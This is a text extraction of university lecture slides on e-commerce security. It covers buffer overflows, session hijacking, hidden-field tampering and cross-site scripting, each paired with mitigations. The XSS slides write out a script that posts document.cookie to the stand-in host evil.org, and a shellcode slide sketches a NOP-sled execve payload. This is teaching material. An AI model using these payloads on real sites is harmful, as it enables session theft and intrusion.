CSE 190: Internet E-Commerce

1
CSE 190 Internet E-Commerce

• Lecture 15 Security

2
Security Three Focuses

• Prevention
• Most common approach
• Detection
• Beyond Intrusion Detection Systems (IDS) what
  is application responsibility
• Recovery
• Often neglected
• Reference Secrets Lies by Schneir

3
Security Posture of ane-Commerce Infrastructure
4
Attack Buffer Overflow

• Based on boundary checking failure
• foo(char s)
• char buf42
• // ...
• strcpy(buf, s)
• // ...
• What if strlen(s) gt 42 ?

5
Stack Frame
SP
buf
RET
s
0000 0000 08000490
FFFF2480
Consider s AAAAAAAAAAAAAAAAAA
6
Stack Frame
SP
buf
RET
s
4141 4141 41414141
41414141
Consider s AAAAAAAAAAAAAAAAAA
7
Executing Code

• Basic Principle
• Place code in buffer
• Overwrite return address to point to code
• Shell code
• Often execve(/bin/sh, args)
• NOP sled

8
Shell Code (cont)
s \x90\x90...\x90 / NOP sled /
\xeb.../bin/sh / shellcode /
\xff\xff\x01\xde...\xff\xff\x01\xde /
return addr /
SP
buf
RET
s
9090...9090 EBAF...68 FFFF...DE FFFF01DE
FFFF01DE
9
Buffer Overflow Impact

• Execute arbitrary code with privileges of
  vulnerable process
• Often remotely exploitable
• Examples
• Code Red (Microsoft IIS Indexing DLL)
• Oracle 8i TNS Listener
• Netscape Enterprise Content Negotiation

10
Buffer Overflow Mitigation

• Coding Standards
• strncpy() instead of strcpy(), etc
• Completeness?
• Code audits
• Manual/Automated
• Robust/Automated Memory Management
• String classes
• Java, Perl etc
• Testing
• Coverage?
• Correctness through testing harder than
  development

11
Attack Hijacking Sessions

• Insufficient Entropy (Randomness) in session Ids
• Client 1
• Cookie sessTWGYLZIAAACVDQ3UUSZQV2I

Client 2 Cookie sessTWGY0WYAAACVFQ3UUSZQV2I
E.g., IBM Websphere 3.x
12
Session Hijacking Impact

• Brute-force search for valid session Ids
• Web server as oracle
• Full, unauthorized control over user session
• Information disclosure
• Online theft
• Pretexting

13
Session Hijacking Mitigation

• Generate Session IDs using cryptographically
  strong PRNG
• Good source of entropy
• E.g. /dev/urandom
• Cryptographic verification
• E.g. HMAC-SHA1
• App-level IDS
• Alert on multiple, invalid session IDs

14
Client State Perturbation
ltFORM METHODPOST ACTIONhttps//merchant.com/buy
.cgigt . . . ltINPUT TYPEHIDDEN NAMETOTAL
VALUE46.90gt ltINPUT TYPESUBMIT VALUE
OK gtlt/FORMgt
15
Client State Perturbation Impact

• Fraud (previous example)
• Unauthorized Access to Information
• https//url.com/show_account.cgi?cust_id29352
• Unauthorized Modification of Data

16
Client State Perturbation Mitigation

• Do not trust any values received from client (URL
  params, forms, cookies)
• Cross-validate against known session state
• Cryptographically verify arguments (MAC)
• Minimize state maintained in client
• Server-side session object
• Stateless UI Flows

17
Attack Cross-Site Scripting
... ltPgtSearch results for queryxyzltPgtltHRgt ..
.
Merchant.com
Search results forquery xyz DVD XYZ
18
Cross-Site Scripting (cont)
Merchant.com
Product Search
ltSCRI
... ltPgtSearch results for queryltSCRIPTgt
alert(boo!)lt/SCRIPTgtltPgtltHRgtNothing
found ...
Merchant.com
Submit
Search results forquery Nothing found
boo!
Ok
19
Cross-Site ScriptingMalicious Script

• ltform namesnagactionhttp//evil.org/ snag_it.c
  gi methodpostgt
• ltinput typehiddennameitgt
• lt/formgt
• ltscriptgt document.snag.it document.cookie
  document.snag.submit()
• lt/scriptgt

• Script discloses cookie to evil.org
• JavaScript security model
• Same Origin policy
• Script can only access properties of objects form
  its own domain of origin
• Execute script with origin merchant.com?

20
Cross-Site Scripting Injecting Malicious Script

• Arrange for target to view page
  containingltiframe src.../evil.htmlgt
• Any page under evil.orgs control
• HTML email
• Form POST to merchant.com
• Form POST of cookie to evil.org

• http//evil.org/evil.html
• ltform namef action http//www.merchant.com/
  search.cgi methodpostgt
• ltinput typetext namequery
• valueltform namesnag ...gt
• ltinput typesubmit ...gt
• lt/formgt
• ltscriptgt document.f.submit()
• lt/scriptgt

21
Cross-Site ScriptingImpact

• Unauthorized disclosure of user information
• Unauthorized gaining of control over use sessions
• Theft
• Etc

22
Cross-Site Scripting Mitigation

• Escape user input before rendering in-line with
  HTMLltPgtSearch results for queryltSCRIPTgt
  
• Challenges
• Input processing Verbatim processing of inputs
• Output processing Coverage

23
Architectural ConsiderationsDealing with the
Unknown

• Defense in Depth
• Trust Relationships
• Compartmentalization
• Encryption
• Passive Defense vs. Active Response

24
Multi-Tiered Architecture

• Tight filtering policies between networks
• Effective against unknown vulnerabilities with
  execute code on server impact
• Host/Network IDS Response Capability

25
Security DMZ

• DMZ Demilitarized Zone
• Servers designated less secure not related to
  terrorism!
• Use two firewalls to create a DMZ database
  behind 2nd

26
Trust Relationships/ Compartmentalization

• Minimize assumptions/trust between architectural
  tiers/software layers
• Multiple layers of validation
• Independent authentication/authorization
• E.g. Granular DB-level access control
• Views
• Stored procedures
• Mitigation of input validation errors

27
Encryption

• Protection of data in transit/persistent store
• 3DES, AES, RSA
• SSL
• Data protection in partially compromised system
• Insider Threat
• Separation of duties (DBA vs. Key Mgmt)

28
Encryption

• Secure Sockets Layer (SSL)
• Encrypts just before converting HTTP content into
  TCP/IP packets for Internet transmission.
• HTTPS denotes secure servers. Default port is
  443 (as opposed to 80 of HTTP servers). Both can
  run on same machine.
• Client and server exchange session-long
  encryption keys, and also server authenticates
  via certificate

29
Defense vs. Recovery

• No software is 100 bug free
• Some bugs constitute vulnerabilities
• No software is 100 secure
• Detection and response capabilities
• Exception handling
• Log scanning
• Operator alerts